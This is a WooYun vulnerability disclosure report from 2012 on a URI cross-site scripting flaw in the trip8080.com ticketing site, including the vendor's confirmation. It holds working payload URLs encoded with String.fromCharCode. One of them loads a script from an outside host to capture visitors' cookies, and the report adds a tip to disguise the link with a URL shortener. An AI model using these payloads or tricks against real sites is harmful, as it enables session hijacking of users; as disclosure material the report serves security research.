当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-012290

漏洞标题:畅途网URI_XSS

相关厂商:畅途网

漏洞作者: 瘦蛟舞

提交时间:2012-09-17 11:59

修复时间:2012-11-01 12:00

公开时间:2012-11-01 12:00

漏洞类型:xss跨站脚本攻击

危害等级:低

自评Rank:8

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2012-09-17: 细节已通知厂商并且等待厂商处理中
2012-09-18: 厂商已经确认,细节仅向厂商公开
2012-09-28: 细节向核心白帽子及相关领域专家公开
2012-10-08: 细节向普通白帽子公开
2012-10-18: 细节向实习白帽子公开
2012-11-01: 细节向公众公开

简要描述:

URI跨站,原来以为有参数才有跨站,没想到......

详细说明:

先弹一下。。。。。。


然后想着盲打,开始怎么试都不行,以为是 / 被过滤掉了。
后来想想,这个是URI形成的跨站如果有 / 结构就被破坏了。
可以用charcode编码一次,再用string.fromcharcode解码回来就可以绕过/的限制了。
弹窗的
http://www.trip8080.com/chepiao/%3Cvideo%3E%3Csource%20onerror=javascript:document.write%28String.fromCharCode%2860,115,99,114,105,112,116,62,97,108,101,114,116,40,49,41,60,47,115,99,114,105,112,116,62%29%29%3E.htm
截cookie的
http://www.trip8080.com/chepiao/%3Cvideo%3E%3Ciframe%20onload=javascript:document.write%28String.fromCharCode%2860,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,58,47,47,49,46,109,97,103,105,99,120,115,115,46,115,105,110,97,97,112,112,46,99,111,109,47,120,115,115,46,106,115,34,62,60,47,115,99,114,105,112,116,62%29%29%3E.htm
成功截获cookie


=-=! URL好长可以用短地址修饰下。

漏洞证明:

外带两个
error message


JMXInvokerServlet

修复方案:

不会~

版权声明:转载请注明来源 瘦蛟舞@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2012-09-18 10:55

厂商回复:

非常感谢

最新状态:

暂无